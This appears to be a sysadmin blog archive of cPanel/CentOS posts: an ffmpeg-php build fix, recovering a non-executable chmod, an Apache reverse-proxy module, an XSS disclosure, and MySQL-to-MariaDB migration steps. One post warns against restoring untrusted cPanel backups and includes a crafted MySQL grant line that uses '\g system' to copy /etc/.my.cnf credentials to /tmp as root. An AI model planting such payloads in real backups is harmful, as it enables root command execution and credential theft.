error: field ‘st_atim’ has incomplete type FFMPEG

While installing ffmpeg-php-0.6.0  on centos server, if you may came across the below error , like ::

In file included from /usr/include/sys/stat.h:107,
 from /usr/include/php/main/php_streams.h:28,
 from /usr/include/php/main/php.h:395,
 from /root/ffmpeg-php-0.6.0/ffmpeg-php.c:40:
/usr/include/bits/stat.h:91: error: field ‘st_atim’ has incomplete type
/usr/include/bits/stat.h:92: error: field ‘st_mtim’ has incomplete type
/usr/include/bits/stat.h:93: error: field ‘st_ctim’ has incomplete type
/usr/include/bits/stat.h:152: error: field ‘st_atim’ has incomplete type
/usr/include/bits/stat.h:153: error: field ‘st_mtim’ has incomplete type
/usr/include/bits/stat.h:154: error: field ‘st_ctim’ has incomplete type
In file included from /usr/include/php/main/php_streams.h:28,
 from /usr/include/php/main/php.h:395,
 from /root/ffmpeg-php-0.6.0/ffmpeg-php.c:40:
/usr/include/sys/stat.h:367: error: array type has incomplete element type
/usr/include/sys/stat.h:374: error: array type has incomplete element type
In file included from /usr/include/php/main/php.h:401,
 from /root/ffmpeg-php-0.6.0/ffmpeg-php.c:40:
/usr/include/php/TSRM/tsrm_virtual_cwd.h:218: error: expected specifier-qualifier-list before ‘time_t’
/usr/include/php/TSRM/tsrm_virtual_cwd.h:246: error: expected declaration specifiers or ‘...’ before ‘time_t’
/root/ffmpeg-php-0.6.0/ffmpeg-php.c: In function ‘zm_startup_ffmpeg’:
/root/ffmpeg-php-0.6.0/ffmpeg-php.c:94: warning: implicit declaration of function ‘avcodec_init’

After looking up for hours, I found the issue that ffmpeg own time.h file was conflicting with centos own time.h file, unfortunately ffmpeg-php has not been updated in a long time, so decided to search ffmpeg php extension on github and I found a repo maintained by tony2001 who has made some changes to the original project and using his repo I’m able to install it  on CentOS-6.5  but I guess  it works on other centos versions too

Follow the steps below to install it

git clone https://github.com/tony2001/ffmpeg-php.git
cd ffmpeg-php
phpize
./configure
make && make install

 

Just try:: chmod -x /bin/chmod

What will happen if you remove the executable flag from the chmod binary itself? :D

root@server:~# chmod -x /bin/chmod
root@server:~# 
root@server:~# chmod +x /bin/chmod
-bash: /bin/chmod: Permission denied
root@server:~# ls -ld /bin/chmod
-rw-r--r-- 1 root root 51760 Apr  1  2012 /bin/chmod

How do you recover chmod in this case and make it executable again?  Here is a list of possible solutions :D

1) perl -e 'chmod 0755, "/bin/chmod"'
2) 32 bit OS
     /lib/ld-linux.so.2 /bin/chmod +x /bin/chmod
   64 bit OS
     /lib64/ld-linux-x86-64.so.2 /bin/chmod +x /bin/chmod
3) install -m a+x /bin/chmod /root/chmod
   /root/chmod +x /bin/chmod
4)  cat > chmod.c << EOF
#include<stdio.h>
main()
{
    printf("Hello World");
}
EOF

gcc chmod.c -o /tmp/chmod
cat /bin/chmod > /tmp/chmod
/tmp/chmod +x /bin/chmod 

 

mod_reveseproxy: extract client IP from reverse proxy

If you setup Apache 2.4 With mod_remoteip, the apache extendedstatus always gives you the proxy IP, instead of client IP, actually this is due to that the mod_status  set client IP very early when there is a TCP connection but no headers, Apache 2.4 allows per-request notion of overriding the client address, but not at this early stage. To overcome this issue, I would suggest you to use mod_reveseproxy apache module, the modules is completely based on mod_cloudflare and mod_remoteip.

To install, follow the instructions on:

 

   wget https://raw.github.com/Prajithp/mod_reverseproxy/master/mod_reverseproxy.c
   apxs -i -c -n mod_reverseproxy.so mod_reverseproxy.c  

Configuration Directives

ReverseProxyEnable           (On|Off)          - Enable reverse proxy

ReverseProxyRemoteIPHeader   X-Real-IP         - The header to use for the real IP
                                                 address.
ReverseProxyRemoteIPTrusted  127.0.0.1         -  What IPs to adjust requests for

Example Configuration

LoadModule reverseproxy_module modules/mod_reverseproxy.so

<IfModule reverseproxy_module>
  ReverseProxyEnable  On
  ReverseProxyRemoteIPHeader X-Real-IP
  ReverseProxyRemoteIPTrusted 127.0.0.1
  ReverseProxyRemoteIPTrusted 46.105.160.192
</IfModule>

NOTES:

  • If mod_cloudflare or mod_remoteip are already loaded on the same web server, the web server will crash because both modules try to set the remote IP to a different value.

https://github.com/Prajithp/mod_reverseproxy

WHM/cPanel Cross-Site Scripting Vulnerability

WHM/cPanel is prone to  cross-site scripting vulnerabilities because it fails to properly sanitize users inputs and datastore files.

Due to the nature of this security flaw,  I will not be posting a Proof of Concept until much later.

 

Type: XSS
Product: cPanel
Website: http://www.cpanel.net
Vulnerable Version: WHM 11.40 and prior.
Date: 11/11/2013
By: Prajith P <http://prajith.in>

Vendor Contact Timeline:

2013-111-11: 3:37 AM IST – Vendor contacted via email.

2013-111-11: 7:44 AM IST –  Vendor confirmed vulnerability. and filed security report(case number 82701).

Don’t restore cPanel backup from untrusted source

In WHM, there is a feature  “restore account”  which is used to restore a full account backup. Normal users can generate the backup  from cPanel and  It contains all the information for an account including the files and  meta data.

One of the meta data items is MySQL grants which is located inside the backup file. When you are restoring the account using WHM UI or restorepkg command, the mysql meta file will be restored as root user.
Now you may be thinking that there’s nothing wrong, and everything looks normal. But this is really really bad because you can embed arbitrary commands in SQL files and those commands will execute when the file is restored as  root user. Let me explain it.

 

root@server1 [/home/prajith]# cat mysql.sql
\! id
root@server1 [/home/prajith]# mysql < mysql.sql
uid=0(root) gid=0(root) groups=0(root)
root@server1 [/home/prajith]

so we can insert any linux commands to mysql meta file and this will be execute as root while restoring the account.

Here is an example:

  GRANT USAGE ON *.* TO 'whmtest'@'localhost' IDENTIFIED BY PASSWORD '*A4E12252EACEA5A79<XXXXX>E11D47296FE237D5897'\g system /etc/.my.cnf >> /tmp/test.txt;
GRANT ALL PRIVILEGES ON `whmtest\_pop`.* TO 'whmtest'@'localhost';

while restoring the account,  mysql will execute the linux commands using system function and the output will be saved to /tmp/test.txt and later we can read this file using http request. so don’t restore the backup from untrusted source :D

Update:: Mod_Pagespeed

We’ve upgraded Mod_Pagespeed Easyapache Build to stable version. You can find the source on github.

 

Installation instructions

  1. Clone the installation scripts onto your CPanel server:
    $> git clone http://github.com/pagespeed/cpanel.git /var/cpanel/easy/apache/custom_opt_mods/Cpanel/
    
  2. Create Speed.pm.tar.gz
    $> cd /var/cpanel/easy/apache/custom_opt_mods/Cpanel/Easy && tar -zcvf Speed.pm.tar.gz pagespeed
    
  3. Login into your cPanel WHM > EasyApache and look for “mod_pagespeed” option. Alternatively, you can run the easyapache installer from command line (/scripts/easyapache). Rebuild the Apache server, reboot it, and you’re good to go!

Configuring mod_pagespeed

The installation script will copy a default pagespeed.conf file into /usr/local/apache/conf/ on your server. Please consult the following pages to customize your configuration:

For example of the different filters in action and detailed documentation for each, please see modpagespeed.com

ApacheBooster V1.9 Stable released

We are pleased to announce the release of ApacheBooster v1.9

We’ve upgraded ApacheBooster to 1.9. We have made several changes in configuration and also Fixed some Bugs. Please see the new features and updates.

1) Fixed WHM interface issue.

2) Fixed WHM ACL bug.

3) Created Custom ACL for WHM.

4) Fixed Uninstall script bug.

If you need any help or if you find any bug or do you need any new feature please feel free to contact me.

Please do the following steps to upgrade.

wget http://prajith.in/downloads/updateapachebooster
sh updateapachebooster

Installation

 

wget http://prajith.in/downloads/apachebooster.tar.gz
tar -zxf apachebooster.tar.gz
cd apachebooster
bash install.sh  or sh install.sh

Install MariaDB in cPanel/WHM

MariaDB is “An enhanced, drop-in replacement for MySQL”. Below you will find some steps on how to affectively stop cPanel/WHM from maintaining MySQL and begin utilizing MariaDB  for any and all database activity on your server but please note that,  cPanel/WHM no longer maintains MySQL on your system it is on the Systems Administrator to manage and maintain any updates and maintenance on the database software.  We recommend only experienced systems administrators perform the above and we are not responsible for any possible data loss.

 

Step 1: Backup existing MySQL data

Make sure to save all existing data just in case there are any issues.

cp -Rf /var/lib/mysql /var/lib/mysql-old
mv /etc/my.cnf /etc/my.cnf-old

## Also please take sql file of the existing databases, so that we can avoid the data lose

Step 2: Disable the targets so cPanel no longer handles MySQL updates #ONLY FOR cPanel 11.36+

The following will mark the versions of MySQL we distribute as uninstalled so they are no longer maintained by cPanel/WHM

/scripts/update_local_rpm_versions --edit target_settings.MySQL50 uninstalled
/scripts/update_local_rpm_versions --edit target_settings.MySQL51 uninstalled
/scripts/update_local_rpm_versions --edit target_settings.MySQL55 uninstalled

Step 3: Remove existing MySQL RPM’s so theres a clean slate for MariaDB

Important: The below command will uninstall the MySQL RPM’s!
/scripts/check_cpanel_rpms --fix --targets=MySQL50,MySQL51,MySQL55
[20130623.211100]    
[20130623.211100]   The following RPMs are unneeded on your system and should be uninstalled:
[20130623.211100]   MySQL55-client.5.5.31-1.cp1136
[20130623.211100]   MySQL55-devel.5.5.31-1.cp1136
[20130623.211100]   MySQL55-server.5.5.31-1.cp1136
[20130623.211100]   MySQL55-shared.5.5.31-1.cp1136
[20130623.211100]   MySQL55-test.5.5.31-1.cp1136
0
[20130623.211100]   Removing 0 broken rpms: 
[20130623.211100]   rpm: no packages given for erase
[20130623.211100]   No new RPMS needed for install
[20130623.211100]   Uninstalling unneeded rpms: MySQL55-test MySQL55-server MySQL55-client MySQL55-shared MySQL55-devel

Step 4: Create a yum repository for MariaDB

access https://downloads.mariadb.org/mariadb/repositories and select the DISTRO and place the repo content to /etc/yum.repos.d/MariaDB.repo

EX (In my cause):
#vi /etc/yum.repos.d/MariaDB.repo

# MariaDB 5.5 CentOS repository list - created 2013-06-23 21:13 UTC
# http://mariadb.org/mariadb/repositories/
[mariadb]
name = MariaDB
baseurl = http://yum.mariadb.org/5.5/centos6-amd64
gpgkey=https://yum.mariadb.org/RPM-GPG-KEY-MariaDB
gpgcheck=

Step 5: install MariaDB using the  following command

yum install MariaDB-server MariaDB-client MariaDB-devel

##If you are having any dependency problem, please remove php from the /etc/yum.conf file and then run yum  command again. Please add it back to yum conf once the package is installed. 

/etc/init.d/mysql start
mysql_upgrade
/etc/init.d/mysql restart

Final Step: Rebuild easyapache/php to ensure modules are intact/working

/scripts/easyapache --build